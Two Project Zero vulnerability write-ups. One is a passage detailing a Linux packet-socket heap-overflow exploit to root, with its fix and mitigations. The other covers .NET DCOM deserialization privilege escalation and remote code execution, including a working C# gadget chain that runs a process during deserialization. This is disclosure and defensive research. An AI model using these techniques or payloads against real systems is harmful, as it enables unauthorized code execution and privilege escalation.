Let’s see how we can exploit this vulnerability. I’m going to be targeting x86-64 Ubuntu 16.04.2 with the 4.8.0-41-generic kernel, with KASLR, SMEP and SMAP enabled. The Ubuntu kernel has user namespaces available to unprivileged users (CONFIG_USER_NS=y and no restrictions on its usage), so the bug can be exploited to gain root privileges by an unprivileged user. All of the exploitation steps below are performed from within a user namespace.
The Linux kernel has support for a few hardening features that make exploitation more difficult. KASLR (Kernel Address Space Layout Randomization) puts the kernel text at a random offset to make jumping to a particular fixed address useless. SMEP (Supervisor Mode Execution Protection) causes an oops whenever the kernel tries to execute code from the userspace memory and SMAP (Supervisor Mode Access Prevention) does the same whenever the kernel tries to access the userspace memory directly.
Shaping heap
The idea of the exploit is to use the heap out-of-bounds write to overwrite a function pointer in the memory adjacent to the overflown block. For that we need to specifically shape the heap, so some object with a triggerable function pointer is placed right after a ring buffer block. I chose the already mentioned packet_sock struct to be this object. We need to find a way to make the kernel allocate a ring buffer block and a packet_sock struct one next to the other.
As I mentioned above, ring buffer blocks are allocated with the kernel page allocator (the buddy allocator). It allocates blocks of 2^n contiguous memory pages. The allocator keeps a freelist of such blocks for each n and returns the freelist head when a block is requested. If the freelist for some n is empty, it finds the first m > n for which the freelist is not empty and splits blocks in halves until the required size is reached. Therefore, if we start repeatedly allocating blocks of size 2^n pages, at some point they will start coming from one high-order memory block being split, and each will be adjacent to the next.
A packet_sock is allocated via the kmalloc() function by the slab allocator. The slab allocator is mostly used to allocate objects of a smaller-than-one-page size. It uses the page allocator to allocate a big block of memory and splits this block into smaller objects. The big blocks are called slabs, hence the name of the allocator. A set of slabs together with their current state and a set of operations like “allocate an object” and “free an object” is called a cache. The slab allocator creates a set of general purpose caches for objects of size 2^n. Whenever kmalloc(size) is called, the slab allocator rounds size up to the nearest power of 2 and uses the cache of that size.
Since the kernel uses kmalloc() all the time, if we try to allocate an object it will most likely come from one of the slabs already created during previous usage. However, if we start allocating objects of the same size, at some point the slab allocator will run out of slabs for this size and will have to allocate another one via the page allocator.
The size of a newly allocated slab depends on the size of objects this slab is meant for. The size of the packet_sock struct is ~1920 and 1024 < 1920 <= 2048, which means that it’ll be rounded to 2048 and the kmalloc-2048 cache will be used. Turns out, for this particular cache the SLUB allocator (which is the kind of slab allocator used in Ubuntu) uses slabs of size 0x8000. So whenever the allocator runs out of slabs for the kmalloc-2048 cache, it allocates 0x8000 bytes with the page allocator.
Keeping all that in mind, this is how we can allocate a kmalloc-2048 slab next to a ring buffer block:
  1. Allocate a lot (512 worked for me) of objects of size 2048 to fill currently existing slabs in the kmalloc-2048 cache. To do that we can create a bunch of packet sockets to cause allocation of packet_sock structs.
  2. Allocate a lot (1024 worked for me) of page blocks of size 0x8000 to drain the page allocator freelists and cause some high-order page block to be split. To do that we can create another packet socket and attach a ring buffer with 1024 blocks of size 0x8000.
  3. Create a packet socket and attach a ring buffer with blocks of size 0x8000. The last one of these blocks (I’m using 2 blocks, the reason is explained below) is the one we’re going to overflow.
  4. Create a bunch of packet sockets to allocate packet_sock structs and cause an allocation of at least one new slab.
This way we can shape the heap in the following way:

The exact number of allocations to drain freelists and shape the heap the way we want might be different for different setups and depend on the memory usage activity. The numbers above are for a mostly idle Ubuntu machine.
Controlling the overwrite
Above I explained that the bug results in a write of a controlled maximum size at a controlled offset out of the bounds of a ring buffer block. It turns out that not only can we control the maximum size and offset, we can actually control the exact data (and its size) that’s being written. Since the data that’s being stored in a ring buffer block is the packet that’s passing through a particular network interface, we can manually send packets with arbitrary content on a raw socket through the loopback interface. If we do that in an isolated network namespace, no external traffic will interfere.
There are a few caveats though.
First, it seems that the size of a packet must be at least 14 bytes (12 bytes for two MAC addresses and 2 bytes for the EtherType, apparently) for it to be passed to the packet socket layer. That means that we have to overwrite at least 14 bytes. The data in the packet itself can be arbitrary.
Then, the lowest 3 bits of nxt_offset always have the value of 2 due to the alignment. That means that we can’t start overwriting at an 8-byte aligned offset.
Besides that, when a packet is being received and saved into a block, the kernel updates some fields in the block and frame headers. If we point nxt_offset to some particular offset we want to overwrite, the data at the locations where the block and frame headers end up will probably be corrupted.
Another issue is that if we make nxt_offset point past the block end, the first block will be immediately closed when the first packet is being received, since the kernel will (correctly) decide that there’s no space left in the first block (see the __packet_lookup_frame_in_block() snippet). This is not really an issue, since we can create a ring buffer with 2 blocks. The first one will be closed, the second one will be overflown.
Executing code
Now, we need to figure out which function pointers to overwrite. There are a few function pointer fields in the packet_sock struct, but I ended up using the following two:
  1. packet_sock->xmit
  2. packet_sock->rx_ring->prb_bdqc->retire_blk_timer->func

The first one is called whenever a user tries to send a packet via a packet socket. The usual way to elevate privileges to root is to execute the commit_creds(prepare_kernel_cred(0)) payload in a process context. The xmit pointer is called from a process context, which means we can simply point it to the executable memory region, which contains the payload.
To do that we need to put our payload to some executable memory region. One of the possible ways for that is to put the payload in the userspace, either by mmapping an executable memory page or by just defining a global function within our exploit program. However, SMEP & SMAP will prevent the kernel from accessing and executing user memory directly, so we need to deal with them first.
For that I used the retire_blk_timer field (the same field used by Philip Pettersson in his CVE-2016-8655 exploit). It contains a function pointer that’s triggered whenever the retire timer times out. During normal packet socket operation, retire_blk_timer->func points to prb_retire_rx_blk_timer_expired() and it’s called with retire_blk_timer->data as an argument, which contains the address of the packet_sock struct. Since we can overwrite the data field along with the func field, we get a very nice func(data) primitive.
The state of SMEP & SMAP on the current CPU core is controlled by the 20th and 21st bits of the CR4 register. To disable them we should zero out these two bits. For this we can use the func(data) primitive to call native_write_cr4(X), where X has the 20th and 21st bits set to 0. The exact value of X might depend on what other CPU features are enabled. On the machine where I tested the exploit, the value of CR4 is 0x1407f0 (only the SMEP bit is enabled, since the CPU has no SMAP support), so I used X = 0x407f0. We can use the sched_setaffinity syscall to force the exploit program to be executed on one CPU core, thus making sure that the userspace payload will be executed on the same core where we disable SMAP & SMEP.
Putting this all together, here are the exploitation steps:
  1. Figure out the kernel text address to bypass KASLR (described below).
  2. Pad heap as described above.
  3. Disable SMEP & SMAP.
    1. Allocate a packet_sock after a ring buffer block.
    2. Schedule a block retire timer on the packet_sock by attaching a receive ring buffer to it.
    3. Overflow the block and overwrite retire_blk_timer field. Make retire_blk_timer->func point to native_write_cr4 and make retire_blk_timer->data equal to the desired CR4 value.
    4. Wait for the timer to be executed, now we have SMEP & SMAP disabled on the current core.
  4. Get root privileges.
    1. Allocate another pair of a packet_sock and a ring buffer block.
    2. Overflow the block and overwrite xmit field. Make xmit point to a commit_creds(prepare_kernel_cred(0)) allocated in userspace.
    3. Send a packet on the corresponding packet socket, xmit will get triggered and the current process will obtain root privileges.

The exploit code can be found here.
It should be noted that when we overwrite these two fields in the packet_sock structs, we’ll end up corrupting some of the fields before them (the kernel will write some values to the block and frame headers), which can lead to a kernel crash. However, as long as these other fields don’t get used by the kernel, we should be good. One field I found that caused crashes when trying to close all packet sockets after the exploit finished is the mclist field, but simply zeroing it out helps.

KASLR bypass
I didn’t bother to come up with some elaborate KASLR bypass technique which exploits the same bug. Since Ubuntu doesn’t restrict dmesg by default, we can just grep the kernel syslog for the “Freeing SMP” string, which contains a kernel pointer, that looks suspiciously similar to the kernel text address:
# Boot #1
$ dmesg | grep 'Freeing SMP'
[    0.012520] Freeing SMP alternatives memory: 32K (ffffffffa58ee000 - ffffffffa58f6000)
$ sudo cat /proc/kallsyms | grep 'T _text'
ffffffffa4800000 T _text
# Boot #2
$ dmesg | grep 'Freeing SMP'
[    0.017487] Freeing SMP alternatives memory: 32K (ffffffff85aee000 - ffffffff85af6000)
$ sudo cat /proc/kallsyms | grep 'T _text'
ffffffff84a00000 T _text
By doing simple math we can calculate the kernel text address based on the one exposed through dmesg. This way of figuring out the kernel text location works only for some time after boot, as syslog only stores a fixed number of lines and starts dropping them at some point.
There are a few Linux kernel hardening features that can be used to prevent this kind of information disclosure. The first one is called dmesg_restrict and it restricts the ability of unprivileged users to read the kernel syslog. It should be noted that even with dmesg restricted, the first user on Ubuntu can still read the syslog from /var/log/kern.log and /var/log/syslog, since they belong to the adm group.
Another feature is called kptr_restrict and it doesn’t allow unprivileged users to see pointers printed by the kernel with the %pK format specifier. However in 4.8 the free_reserved_area() function uses %p, so kptr_restrict doesn’t help in this case. In 4.10 free_reserved_area() was fixed not to print address ranges at all, but the change was not backported to older kernels.
Let’s take a look at the fix. The vulnerable code as it was before the fix is below. Remember that the user fully controls both tp_block_size and tp_sizeof_priv.
                if (po->tp_version >= TPACKET_V3 &&
                    (int)(req->tp_block_size -
                          BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
                        goto out;
When thinking about a way to fix this, the first idea that comes to mind is that we can compare the two values as is without that weird conversion to int:
                if (po->tp_version >= TPACKET_V3 &&
                    req->tp_block_size <=
                          BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv))
                        goto out;
Funnily enough, this doesn’t actually help. The reason is that an overflow can happen while evaluating BLK_PLUS_PRIV in case tp_sizeof_priv is close to the maximum unsigned int value.
#define BLK_PLUS_PRIV(sz_of_priv) \
        (BLK_HDR_LEN + ALIGN((sz_of_priv), V3_ALIGNMENT))
One of the ways to fix this overflow is to cast tp_sizeof_priv to uint64 before passing it to BLK_PLUS_PRIV. That’s exactly what I did in the fix that was sent upstream.
                if (po->tp_version >= TPACKET_V3 &&
                    req->tp_block_size <=
                          BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv))
                        goto out;

Mitigation
Creating a packet socket requires the CAP_NET_RAW capability, which can be acquired by an unprivileged user inside a user namespace. Unprivileged user namespaces expose a huge kernel attack surface, which has resulted in quite a few exploitable vulnerabilities (CVE-2017-7184, CVE-2016-8655, ...). This kind of kernel vulnerability can be mitigated by completely disabling user namespaces or by disallowing their use by unprivileged users.
To disable user namespaces completely you can rebuild your kernel with CONFIG_USER_NS disabled. Restricting user namespace usage to privileged users only can be done by writing 0 to /proc/sys/kernel/unprivileged_userns_clone in Debian-based kernels. Since version 4.9 the upstream kernel has a similar /proc/sys/user/max_user_namespaces setting.

Conclusion
Right now the Linux kernel has a huge number of poorly tested (from a security standpoint) interfaces and a lot of them are enabled and exposed to unprivileged users in popular Linux distributions like Ubuntu. This is obviously not good and they need to be tested or restricted.
Syzkaller is an amazing tool that allows testing kernel interfaces via fuzzing. Even adding barebones descriptions for another syscall usually uncovers a number of bugs. We certainly need people writing syscall descriptions and fixing existing ones, since there’s a huge surface that’s still not covered and probably a ton of security bugs buried in the kernel. If you decide to contribute, we’ll be glad to see a pull request.

Links
Just a bunch of related links.
Our Linux kernel bug finding tools:
A collection of Linux kernel exploitation materials:

Exploiting .NET Managed DCOM

Google Project Zero - Fri, 04/28/2017 - 12:23
Posted by James Forshaw, Project Zero
One of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they’re difficult for a developer to mitigate outside of not using that technology, something which isn’t always possible.
I discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET, which makes the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability.

A Little Bit of Background Knowledge
If you look at the history of .NET, many of its early underpinnings were about trying to make a better version of COM (for a quick history lesson it’s worth watching this short video of Anders Hejlsberg discussing .NET). This led to Microsoft placing a large focus on ensuring that, while .NET itself might not be COM, it must be able to interoperate with COM. Therefore .NET can both be used to implement as well as consume COM objects. For example, instead of calling QueryInterface on a COM object you can just cast an object to a COM compatible interface. Implementing an out-of-process COM server in C# is as simple as the following:
// Define COM interface.
[ComVisible(true)]
public interface ICustomInterface {
   void DoSomething();
}

// Define COM class implementing interface.
[ComVisible(true)]
public class COMObject : ICustomInterface {
   public void DoSomething() {}
}

// Register COM class with COM services.
RegistrationServices reg = new RegistrationServices();
int cookie = reg.RegisterTypeForComClients(
                   typeof(COMObject),
                   RegistrationClassContext.LocalServer
                 | RegistrationClassContext.RemoteServer,
                   RegistrationConnectionType.MultipleUse);
A client can now connect to the COM server using its CLSID (defined by the Guid attribute on COMObject). This is in fact so simple to do that a large number of core classes in .NET are marked as COM-visible and registered for use by any COM client, even those not written in .NET.
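For illustration, a minimal client could look something like the sketch below. Note that both GUIDs here are made-up placeholders (you would substitute the real interface IID and the Guid attribute value of the registered server class), so this is a sketch of the pattern rather than a working client:

```csharp
using System;
using System.Runtime.InteropServices;

// Hypothetical interface matching the server's ICustomInterface.
// The Guid below is a made-up placeholder, not a real registered IID.
[ComImport, Guid("11111111-2222-3333-4444-555555555555")]
[InterfaceType(ComInterfaceType.InterfaceIsIDispatch)]
interface ICustomInterface {
  void DoSomething();
}

class Client {
  static void Main() {
    // Placeholder CLSID: substitute the Guid placed on the server class.
    Type t = Type.GetTypeFromCLSID(
        new Guid("66666666-7777-8888-9999-aaaaaaaaaaaa"));
    // The activator starts the out-of-process server and hands back a proxy.
    ICustomInterface obj = (ICustomInterface)Activator.CreateInstance(t);
    obj.DoSomething();
  }
}
```

With a real CLSID this is all a native or managed client needs; the runtime (or COM) handles activation and marshaling behind the cast.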

To make this all work the .NET runtime hides a large amount of boilerplate from the developer. There are a couple of mechanisms to influence this boilerplate interoperability code, such as the InterfaceType attribute which defines whether the COM interface is derived from IUnknown or IDispatch but for the most part you get what you’re given.
One thing developers perhaps don’t realize is that it’s not just the interfaces you specify which get exported from the .NET COM object; the runtime adds a number of “management” interfaces as well. These interfaces are implemented by wrapping the .NET object inside a COM Callable Wrapper (CCW).
We can enumerate what interfaces are exposed by the CCW. Taking System.Object as an example the following table shows what interfaces are supported along with how each interface is implemented, either dynamically at runtime or statically implemented inside the runtime.
Interface Name              Implementation Type
_Object                     Dynamic
IConnectionPointContainer   Static
IDispatch                   Dynamic
IManagedObject              Static
IMarshal                    Static
IProvideClassInfo           Static
ISupportErrorInfo           Static
IUnknown                    Dynamic
The _Object interface refers to the COM visible representation of the System.Object class which is the root of all .NET objects, it must be generated dynamically as it’s dependent on the .NET object being exposed. On the other hand IManagedObject is implemented by the runtime itself and the implementation is shared across all CCWs.
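As a quick way to see this for yourself, the probe below queries the CCW of a plain System.Object for IManagedObject. This is a sketch assuming a Windows .NET Framework runtime; the IID used is the IManagedObject GUID from cor.h:

```csharp
using System;
using System.Runtime.InteropServices;

class CcwProbe {
  // IID of IManagedObject as defined in cor.h (assumption: this matches
  // the runtime you are probing).
  static Guid IID_IManagedObject =
      new Guid("C3FCC19E-A970-11D2-8B5A-00A0C9B7C9C4");

  static bool ExposesIManagedObject(object obj) {
    // Force creation of a CCW and grab its IUnknown.
    IntPtr unk = Marshal.GetIUnknownForObject(obj);
    try {
      IntPtr mo;
      int hr = Marshal.QueryInterface(unk, ref IID_IManagedObject, out mo);
      if (hr == 0) {
        Marshal.Release(mo);
        return true;
      }
      return false;
    } finally {
      Marshal.Release(unk);
    }
  }

  static void Main() {
    // Even a bare System.Object's CCW answers for IManagedObject.
    Console.WriteLine(ExposesIManagedObject(new object()));
  }
}
```

The same probe against a remote DCOM proxy is essentially what makes .NET servers easy to fingerprint.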
I started looking at the exposed COM attack surface for .NET back in 2013, when I was investigating Internet Explorer sandbox escapes. One of the COM objects you could access outside the sandbox was the .NET ClickOnce Deployment broker (DFSVC), which turned out to be implemented in .NET, which is probably not too surprising. I actually found two issues, not in DFSVC itself but in the _Object interface exposed by all .NET COM objects. The _Object interface looks like the following (in C++):
struct _Object : public IDispatch {
  HRESULT ToString(BSTR * pRetVal);
  HRESULT Equals(VARIANT obj, VARIANT_BOOL *pRetVal);
  HRESULT GetHashCode(long *pRetVal);
  HRESULT GetType(_Type** pRetVal);
};
The first bug (which resulted in CVE-2014-0257) was in the GetType method. This method returns a COM object which can be used to access the .NET reflection APIs. As the returned _Type COM object was running inside the server you could call a chain of methods which resulted in getting access to the Process.Start method which you could call to escape the sandbox. If you want more details about that you can look at the PoC I wrote and put up on Github. Microsoft fixed this by preventing the access to the reflection APIs over DCOM.
The second issue was more subtle and is a byproduct of a feature of .NET interop which presumably no one realized would be a security liability. Loading the .NET runtime requires quite a lot of additional resources, therefore the default for a native COM client calling methods on a .NET COM server is to let COM and the CCW manage the communication, even though this incurs a performance hit. Microsoft could have chosen to use the COM marshaler to force .NET to be loaded in the client, but this seems overzealous, not even counting the possibility that the client might not have a compatible version of .NET installed.
When .NET interops with a COM object it creates the inverse of the CCW, the Runtime Callable Wrapper (RCW). This is a .NET object which implements a runtime version of the COM interface and marshals it to the COM object. Now it’s entirely possible that the COM object is actually written in .NET, it might even be in the same Application Domain. If .NET didn’t do something you could end up with a double performance hit, marshaling in the RCW to call a COM object which is actually a CCW to a managed object.

It would be nice to try and “unwrap” the managed object from the CCW and get back a real .NET object. This is where the villain in this piece comes into play, the IManagedObject interface, which looks like the following:
struct IManagedObject : public IUnknown {
  HRESULT GetObjectIdentity(
    BSTR*   pBSTRGUID,
    int*    AppDomainID,
    int*    pCCW);
  HRESULT GetSerializedBuffer(
    BSTR *pBSTR);
};
When the .NET runtime gets hold of a COM object it will go through a process to determine whether it can “unwrap” the object from its CCW and avoid creating an RCW. This process is documented but in summary the runtime will do the following:
  1. Call QueryInterface on the COM object to determine if it implements the IManagedObject interface. If not then return an appropriate RCW.
  2. Call GetObjectIdentity on the interface. If the GUID matches the per-runtime GUID (generated at runtime startup) and the AppDomain ID matches the current AppDomain ID then lookup the CCW value in a runtime table and extract a pointer to the real managed object and return it.
  3. Call GetSerializedBuffer on the interface. The runtime will check if the .NET object is serializable, if so it will pass the object to BinaryFormatter::Serialize and package the result in a Binary String (BSTR). This will be returned to the client which will now attempt to deserialize the buffer to an object instance by calling BinaryFormatter::Deserialize.

Both steps 2 and 3 sound like a bad idea. For example, while in step 2 the per-runtime GUID can’t be guessed, if you have access to any other object in the same process (such as the COM object exposed by the server itself) you can call GetObjectIdentity on that object and replay the GUID and AppDomain ID back to the server. This doesn’t really gain you much though; the CCW value is just a number, not a pointer, so at best you’ll be able to extract objects which already have a CCW in place.
Instead it’s step 3 which is really nasty. Arbitrary deserialization is dangerous in almost any language (take your pick: Java, PHP, Ruby, etc.) and .NET is no different. In fact my first ever Blackhat USA presentation (whitepaper) was on this very topic and there’s been follow-up work since (such as this blog post). Clearly this is an issue we can exploit; first let’s look at it from the perspective of privilege escalation.
Elevating Privileges
How can we get a COM server written in .NET to do the arbitrary deserialization? We need the server to try and create an RCW for a serializable .NET object exposed over COM. It would be nice if this could also be done generically; it just so happens that the standard _Object interface has a function we can pass an arbitrary object to: the Equals method. The purpose of Equals is to compare two objects for equality. If we pass a .NET COM object to the server’s Equals method, the runtime must try and convert it to an RCW so that the managed implementation can use it. At this point the runtime wants to be helpful and checks whether it’s really a CCW-wrapped .NET object. The server runtime calls GetSerializedBuffer, which results in arbitrary deserialization in the server process.
This is how I exploited the ClickOnce Deployment broker a second time, resulting in CVE-2014-4073. The trick to exploiting this was to send a serialized Hashtable to the server containing a COM implementation of the IHashCodeProvider interface. When the Hashtable runs its custom deserialization code it needs to rebuild its internal hash structures; it does that by calling IHashCodeProvider::GetHashCode on each key. By adding a Delegate object, which is serializable, as one of the keys we’ll get it passed back to the client. By writing the client in native code, the automatic serialization through IManagedObject won’t occur when the delegate is passed back to us. The delegate object gets stuck inside the server process, but the CCW is exposed to us and we can call it. Invoking the delegate results in the specified function being executed in the server context, which allows us to start a new process with the server’s privileges. As this works generically I even wrote a tool to do it for any .NET COM server, which you can find on Github.

Microsoft could have fixed CVE-2014-4073 by changing the behavior of IManagedObject::GetSerializedBuffer, but they didn’t. Instead Microsoft rewrote the broker in native code. A blog post was also published warning developers of the dangers of .NET DCOM. However, what they didn’t do is deprecate any of the APIs for registering DCOM objects in .NET, so unless a developer is particularly security savvy and happens to read a Microsoft security blog they probably don’t realize it’s a problem.
This bug class exists to this day. For example, when I recently received a new work laptop I did what I always do: enumerate what OEM “value add” software has been installed and see if anything is exploitable. It turns out that the audio driver package installed a COM service written by Dolby. After a couple of minutes of inspection, basically enumerating the accessible interfaces of the COM server, I discovered it was written in .NET (the presence of IManagedObject is always a big giveaway). I cracked out my exploitation tool and in less than 5 minutes I had code execution at local system. This has now been fixed as CVE-2017-7293; you can find the very terse writeup here. Once again, as .NET DCOM is fundamentally unsafe, the only thing Dolby could do was rewrite the service in native code.
Hacking the Caller
Finding a new instance of the IManagedObject bug class focussed my mind on its other implications. The first thing to stress is that the server itself isn’t vulnerable; it’s only when we can force the server to act as a DCOM client calling back to the attacking application that the vulnerability can be exploited. Any .NET application which calls a DCOM object through managed COM interop should have a similar issue, not just servers. Is there any common use case for DCOM, especially in a modern enterprise environment?
My immediate thought was Windows Management Instrumentation (WMI). Modern versions of Windows can connect to remote WMI instances using the WS-Management (WSMAN) protocol, but for legacy reasons WMI still supports a DCOM transport. One use case for WMI is to scan enterprise machines for potentially malicious behavior. One of the reasons for this resurgence is PowerShell (which is implemented in .NET) having easy-to-use support for WMI. Perhaps PS or .NET itself will be vulnerable to this attack if they try and access a compromised workstation in the network?

Looking at MSDN, .NET supports WMI through the System.Management namespace, which has existed since the beginning of .NET. It supports remote access to WMI and, considering the age of the classes, predates WSMAN and so almost certainly uses DCOM under the hood. On the PS front there’s support for WMI through cmdlets such as Get-WmiObject. PS version 3 (introduced in Windows 8 and Server 2012) added a new set of cmdlets including Get-CimInstance. Reading the related link it’s clear why the CIM cmdlets were introduced: support for WSMAN. The link also explicitly points out that the “old” WMI cmdlets use DCOM.

At this point we could jump straight into reverse engineering the .NET and PS class libraries, but there’s an easier way. It’s likely we’d be able to see whether the .NET client queries for IManagedObject by observing the DCOM RPC traffic to a WMI server. Wireshark already has a DCOM dissector, saving us a lot of trouble. For a test I set up two VMs: one with Windows Server 2016 acting as a domain controller and one with Windows 10 as a client on the domain. Then from a Domain Administrator on the client I issued a simple WMI PS command ‘Get-WmiObject Win32_Process -ComputerName’ while monitoring the network using Wireshark. The following image shows what I observed:

The screenshot shows the initial creation request for the WMI DCOM object on the DC server from the PS client. We can see it querying for the IWbemLoginClientID interface, which is part of the initialization process (as documented in MS-WMI). The client then tries to request a few other interfaces; notably it asks for IManagedObject. This almost certainly indicates that a client using the PS WMI cmdlets would be vulnerable.
In order to test whether this is really a vulnerability we’ll need a fake WMI server. This seems like it would be quite a challenge, but all we need to do is modify the registration for the winmgmt service to point to our fake implementation. As long as that service then registers a COM class with the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820}, the COM activator will start the service and serve any client an instance of our fake WMI object. If we look back at our network capture it turns out that the query for IManagedObject isn’t occurring on the main class, but instead on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin. But that’s okay; it just adds a bit of extra boilerplate code. To ensure it’s working we’ll implement the following code, which will tell the deserialization code to look for an unknown assembly called Badgers.
[Serializable, ComVisible(true)]
public class FakeWbemServices :
              ISerializable {
   public void GetObjectData(SerializationInfo info,
                             StreamingContext context) {
       info.AssemblyName = "Badgers, Version=";
       info.FullTypeName = "System.Badgers.Test";
   }

   // Rest of fake implementation...
}
If we successfully injected a serialized stream then we’d expect the PS process to try and lookup a Badgers.dll file and using Process Monitor that’s exactly what we find.
Chaining Up the Deserializer
When exploiting the deserialization for local privilege escalation we can be sure that we can connect back to the server and run an arbitrary delegate. We don’t have any such guarantees in the RCE case. If the WMI client has default Windows Firewall rules enabled then we almost certainly wouldn’t be able to connect to the RPC endpoint made by the delegate object. We also need to be allowed to login over the network to the machine running the WMI client; our compromised machine might not have a login to the domain or the enterprise policy might block anyone but the owner from logging in to the client machine.
We therefore need a slightly different plan: instead of actively attacking the client by exposing a new delegate object, we’ll pass it a byte stream which, when deserialized, executes a desired action. In an ideal world we’d find that one serializable class which just executes arbitrary code for us. Sadly (as far as I know) no such class exists. So instead we’ll need to find a series of “gadget” classes which, when chained together, perform the desired effect.
So in this situation I tend to write some quick analysis tools. .NET supports a pretty good reflection API, so finding basic information such as whether a class is serializable or which interfaces it supports is easy to do. We also need a list of assemblies to check; the quickest way I know of is to use the gacutil utility installed as part of the .NET SDK (and so installed with Visual Studio). Run the command gacutil /l > assemblies.txt to create a list of assembly names you can load and process. For a first pass we’ll look for any classes which are serializable and contain delegates; these might be classes which will execute arbitrary code when some operation is performed. With our list of assemblies we can write some simple code like the following to find those classes; just call FindSerializableTypes for each assembly name string:
static bool IsDelegateType(Type t) {
  return typeof(Delegate).IsAssignableFrom(t);
}

static bool HasSerializedDelegate(Type t) {
  // Custom serialized objects rarely serialize their delegates.
  if (typeof(ISerializable).IsAssignableFrom(t)) {
    return false;
  }

  foreach (FieldInfo field in FormatterServices.GetSerializableMembers(t)) {
    if (IsDelegateType(field.FieldType)) {
      return true;
    }
  }

  return false;
}

static void FindSerializableTypes(string assembly_name) {
  Assembly asm = Assembly.Load(assembly_name);
  var types = asm.GetTypes().Where(t =>   t.IsSerializable
                                      &&  t.IsClass
                                      && !t.IsAbstract
                                      && !IsDelegateType(t)
                                      &&  HasSerializedDelegate(t));
  foreach (Type type in types) {
    Console.WriteLine(type.FullName);
  }
}
Across my system this analysis resulted in only around 20 classes, and many of those were actually in the F# libraries, which are not distributed in a default installation. However one class did catch my eye: System.Collections.Generic.ComparisonComparer&lt;T&gt;. You can find the implementation in the reference source, but as it’s so simple here it is in its entirety:
public delegate int Comparison<T>(T x, T y);

internal class ComparisonComparer<T> : Comparer<T> {
  private readonly Comparison<T> _comparison;

  public ComparisonComparer(Comparison<T> comparison) {
    _comparison = comparison;
  }

  public override int Compare(T x, T y) {
    return this._comparison(x, y);
  }
}
This class wraps a Comparison<T> delegate, which takes two generic parameters (of the same type) and returns an integer, calling the delegate to implement the IComparer<T> interface. While the class is internal, its creation is exposed through the Comparer<T>::Create static method. This is the first part of the chain: with this class and a bit of massaging of serialized delegates we can chain IComparer<T>::Compare to Process::Start and get an arbitrary process created. Now we need the next part of the chain: calling this comparer object with arbitrary arguments.
Comparer objects are used a lot in the generic .NET collection classes, and many of these collection classes also have custom deserialization code. In this case we can abuse the SortedSet<T> class: on deserialization it rebuilds its set using an internal comparer object to determine the sort order. The values passed to the comparer are the entries in the set, which are under our complete control. Let’s write some test code to check it works as we expect:
static void TypeConfuseDelegate(Comparison<string> comp) {
    FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
            BindingFlags.NonPublic | BindingFlags.Instance);
    object[] invoke_list = comp.GetInvocationList();
    // Modify the invocation list to add Process::Start(string, string).
    invoke_list[1] = new Func<string, string, Process>(Process.Start);
    fi.SetValue(comp, invoke_list);
}

// Create a simple multicast delegate.
Delegate d = new Comparison<string>(String.Compare);
Comparison<string> multi = (Comparison<string>) MulticastDelegate.Combine(d, d);
// Replace the second entry in the invocation list with Process::Start.
TypeConfuseDelegate(multi);

// Create set with original comparer.
IComparer<string> comp = Comparer<string>.Create(multi);
SortedSet<string> set = new SortedSet<string>(comp);

// Setup values to call calc.exe with a dummy argument.
set.Add("calc");
set.Add("adummy");

// Test serialization.
BinaryFormatter fmt = new BinaryFormatter();
MemoryStream stm = new MemoryStream();
fmt.Serialize(stm, set);
stm.Position = 0;
fmt.Deserialize(stm);
// Calculator should execute during Deserialize.
The only weird thing about this code is TypeConfuseDelegate. It’s a long-standing issue that .NET delegates don’t always enforce their type signature, especially the return value. In this case we create a two-entry multicast delegate (a delegate which will run multiple single delegates sequentially), setting one delegate to String::Compare, which returns an int, and another to Process::Start, which returns an instance of the Process class. This works, even when deserialized, and invokes the two separate methods. It will then return the created process object as an integer, which just means it will return the pointer to the instance of the process object. So we end up with a chain which looks like the following:

While this is a pretty simple chain it has a couple of problems which makes it less than ideal for our use:
  1. The Comparer<T>::Create method and the corresponding class were only introduced in .NET 4.5, which covers Windows 8 and above but not Windows 7.
  2. The exploit relies in part on a type confusion of the return value of the delegate. While it’s only converting the Process object to an integer this is somewhat less than ideal and could have unexpected side effects.
  3. Starting a process is a bit on the noisy side, it would be nicer to load our code from memory.
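The multicast behaviour that TypeConfuseDelegate piggybacks on, where each target runs in sequence but only the last return value is kept, is easy to demonstrate in isolation (a minimal sketch, without any private field patching):

```csharp
using System;
using System.Collections.Generic;

class MulticastDemo {
  static void Main() {
    var log = new List<int>();

    // Build a two-entry multicast delegate; both targets share the
    // Func<int> signature here, unlike the type-confused exploit case.
    Func<int> f = () => { log.Add(1); return 1; };
    f += () => { log.Add(2); return 2; };

    // Both targets run in order, but the caller only sees the last
    // target's return value.
    int result = f();
    Console.WriteLine(result);           // prints 2
    Console.WriteLine(log.Count);        // prints 2: both targets ran
  }
}
```

In the exploit the second target has a mismatched return type, but since the caller discards all but the final value anyway, the runtime happily invokes the whole list.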

So we’ll need to find something better. We want something which works on .NET 3.5 at a minimum, which is the version Windows Update would automatically upgrade you to on Windows 7. It also shouldn’t rely on undefined behaviour or load our code from outside the DCOM channel, such as over an HTTP connection. Sounds like a challenge to me.
Improving the Chain
While looking at some of the other serializable classes I noticed a few in the System.Workflow.ComponentModel.Serialization namespace. This namespace contains classes which are part of the Windows Workflow Foundation, a set of libraries for building execution pipelines that perform a series of tasks. This alone sounds interesting, and it turns out I have exploited the core functionality before, as a bypass for Code Integrity in Windows PowerShell.
This led me to the ObjectSerializedRef class. This looks very much like a class which will deserialize any object type, not just serializable ones. If that were the case it would be a very powerful primitive for building a more functional deserialization chain.
private sealed class ObjectSerializedRef : IObjectReference,
                                           IDeserializationCallback {
  private Type type;
  private object[] memberDatas;

  private object returnedObject;

  object IObjectReference.GetRealObject(StreamingContext context) {
    returnedObject = FormatterServices.GetUninitializedObject(type);
    return this.returnedObject;
  }

  void IDeserializationCallback.OnDeserialization(object sender) {
    string[] array = null;
    MemberInfo[] serializableMembers =
        FormatterServicesNoSerializableCheck.GetSerializableMembers(
            type, out array);
    FormatterServices.PopulateObjectMembers(returnedObject,
        serializableMembers, memberDatas);
  }
}
